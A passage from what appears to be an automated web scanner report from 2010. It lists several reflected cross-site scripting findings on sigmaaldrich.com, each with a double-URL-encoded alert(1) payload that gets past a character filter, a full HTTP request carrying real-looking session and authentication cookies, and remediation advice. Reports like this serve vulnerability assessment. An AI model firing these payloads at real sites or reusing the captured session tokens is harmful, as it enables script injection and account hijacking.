       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Information/26eab";alert(1)//8e4dd57ad27/vol_issue22_proteoprep20.pdf","E404") ;
   </script>
...[SNIP]...

1.333. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/air-sensitive-handling [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/air-sensitive-handling

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4faa%2522%253balert%25281%2529%252f%252fd3f5923e2a was submitted in the REST URL parameter 1. This input was echoed as f4faa";alert(1)//d3f5923e2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcf4faa%2522%253balert%25281%2529%252f%252fd3f5923e2a/medialib/labware/labware-icons/air-sensitive-handling HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:42 GMT
Content-Length: 28960
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcf4faa";alert(1)//d3f5923e2a/medialib/labware/labware-icons/air-sensitive-handling","E404") ;
   </script>
...[SNIP]...

1.334. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/air-sensitive-handling [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/air-sensitive-handling

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83254%2522%253balert%25281%2529%252f%252fcf3dc4590d was submitted in the REST URL parameter 2. This input was echoed as 83254";alert(1)//cf3dc4590d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib83254%2522%253balert%25281%2529%252f%252fcf3dc4590d/labware/labware-icons/air-sensitive-handling HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:43 GMT
Content-Length: 28960
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib83254";alert(1)//cf3dc4590d/labware/labware-icons/air-sensitive-handling","E404") ;
   </script>
...[SNIP]...

1.335. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/air-sensitive-handling [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/air-sensitive-handling

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3441b%2522%253balert%25281%2529%252f%252f3d148b50841 was submitted in the REST URL parameter 3. This input was echoed as 3441b";alert(1)//3d148b50841 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware3441b%2522%253balert%25281%2529%252f%252f3d148b50841/labware-icons/air-sensitive-handling HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:45 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware3441b";alert(1)//3d148b50841/labware-icons/air-sensitive-handling","E404") ;
   </script>
...[SNIP]...

1.336. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/air-sensitive-handling [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/air-sensitive-handling

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffccd%2522%253balert%25281%2529%252f%252fa87587f8c89 was submitted in the REST URL parameter 4. This input was echoed as ffccd";alert(1)//a87587f8c89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-iconsffccd%2522%253balert%25281%2529%252f%252fa87587f8c89/air-sensitive-handling HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:47 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-iconsffccd";alert(1)//a87587f8c89/air-sensitive-handling","E404") ;
   </script>
...[SNIP]...

1.337. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/air-sensitive-handling [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/air-sensitive-handling

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ead0d%2522%253balert%25281%2529%252f%252f315147b4a04 was submitted in the REST URL parameter 5. This input was echoed as ead0d";alert(1)//315147b4a04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/air-sensitive-handlingead0d%2522%253balert%25281%2529%252f%252f315147b4a04 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:49 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/air-sensitive-handlingead0d";alert(1)//315147b4a04","E404") ;
   </script>
...[SNIP]...

1.338. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/books-and-software [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/books-and-software

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 877c0%2522%253balert%25281%2529%252f%252f2f4ff129287 was submitted in the REST URL parameter 1. This input was echoed as 877c0";alert(1)//2f4ff129287 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

